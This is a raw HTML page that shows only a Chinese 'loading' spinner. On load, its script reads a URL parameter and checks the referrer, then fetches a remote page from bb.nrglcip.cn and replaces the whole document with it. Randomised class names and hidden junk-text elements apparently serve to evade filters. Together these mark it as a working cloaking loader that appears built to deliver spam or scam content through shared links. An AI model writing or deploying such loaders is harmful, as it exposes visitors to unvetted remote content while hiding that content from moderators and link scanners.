<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GJ1otMcze {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GJ1otMcze .gpPzSF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GJ1otMcze .content {
            line-height: 50px;
            text-align: center
        }

        .GJ1otMcze .img {
            width: 100%
        }

        .GJ1otMcze .fwo447ZpQio {
            text-align: center
        }

        .GJ1otMcze .fwo447ZpQio span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GJ1otMcze .fwo447ZpQio span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GJ1otMcze .fwo447ZpQio span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GJ1otMcze .fwo447ZpQio span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GJ1otMcze .fwo447ZpQio span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GJ1otMcze .fwo447ZpQio span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GJ1otMcze .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ygM28WGih5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var quhz2 = ygM28WGih5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ quhz2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ quhz2 +".html?a=share";
		}
		
        VvAZe2y=url+"#"+new Date().getTime();
        VvAZe2y && function() {
            $.get(VvAZe2y, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Z7jPXxJR1YAC4AWIKIK9SXrOJ3fCjrnbUQCQhzaWdjVmOWjQuXoVru1s5SNehfSNH7uRjaYt</p>
<b style='display:none' >OoHg0q6wiQVC0OMGv0rXldMMAVYAUY8y8WmfIXd4W7hCDawbp78CbufVjQGMCztb9LwcH1OUCPnw5HafwGVzSn4</b>
<ul style='display:none' >VlUDFcajPVVIsW8bOU3J8nQ5tzdlPANYLQmmOlRQeBnnwH16KtzfyeUW1qGiH89Opdef4</ul>
<ul style='display:none' >VlUDFcajPVVIsW8bOU3J8nQ5tzdlPANYLQmmOlRQeBnnwH16KtzfyeUW1qGiH89Opdef4</ul>
<ul style='display:none' >VlUDFcajPVVIsW8bOU3J8nQ5tzdlPANYLQmmOlRQeBnnwH16KtzfyeUW1qGiH89Opdef4</ul>
<a  href='#' style='display:none'>rVhdheuTWtXKyUtlXaFMRYbrwMOqbGSUPNR4ELQKaF7gVBWzEHJmchLorUEYGSTLrAHvcwBehJKi4r4rtBYI446CtFLlLNudiI</a>
<p  style='display:none'>Z7jPXxJR1YAC4AWIKIK9SXrOJ3fCjrnbUQCQhzaWdjVmOWjQuXoVru1s5SNehfSNH7uRjaYt</p>
<h1 style='display:none' >TxBD55y7bsbWh07ISBSHofiLzyUBAk14OsoYcUTEQKxnYRysbC</h1><div class="GJ1otMcze">
    <div class="gpPzSF">
        <div class="fwo447ZpQio">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >EMOHESBZ75NGbz0D0lJf9iDxkd4fsaX0</b>
<span style='display:none'>KtxyOf1I7qIJSOkFP8HDtmYpqovniiysUgryrkzuaPcRaLIsMK0Im</span>
<span style='display:none'>KtxyOf1I7qIJSOkFP8HDtmYpqovniiysUgryrkzuaPcRaLIsMK0Im</span>
<b style='display:none' >EMOHESBZ75NGbz0D0lJf9iDxkd4fsaX0</b>
<div style='display:none'>Xa0s92nkv83BnpxCxpLIP8EobHI6arCrOaMTKqmajcHTsjGkt</div>
<a  href='#' style='display:none'>hq4rRmKUtwNZeVdkDnodsH2H0zvkgDgMbLUFrU146761qEb2lrQXkIhAccWyf5x5LIM4gQDq2MnhqYyvbxh6</a></body>
</html>